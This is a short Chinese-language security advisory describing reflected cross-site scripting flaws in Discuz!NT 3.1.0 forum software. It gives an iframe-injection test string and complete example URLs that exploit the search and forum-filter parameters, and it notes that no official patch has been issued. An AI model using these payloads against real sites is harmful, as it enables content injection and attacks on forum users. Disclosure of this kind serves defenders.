Discuz!NT 3.1.0 多处存在跨站漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

北洋贱队(http://bbs.seceye.org)首发 1.在快速搜索区域的“板块”搜索提交跨站测试语句["><iframe+Src=http://www.gohack.org], 获得地址:http://localhost/bbs/forumsearch.aspx?q=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E 2.在论坛板块版面出随意选择一种浏览方式,然后修改或添加加入跨站语句,获得地址: http://localhost/bbs/showforum.aspx?search=1&forumid=31&typeid=0&filter=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E&order=2 http:/localhost/bbs/showforum.aspx?search=1&forumid=54&typeid=0&filter=%22%3E%3Ciframe%20src%3Dhttp%3A//www.gohack.org%3E Discuz!NT 3.1.0 等待官方发补丁

0%
暂无可用Exp或PoC
当前有0条受影响产品信息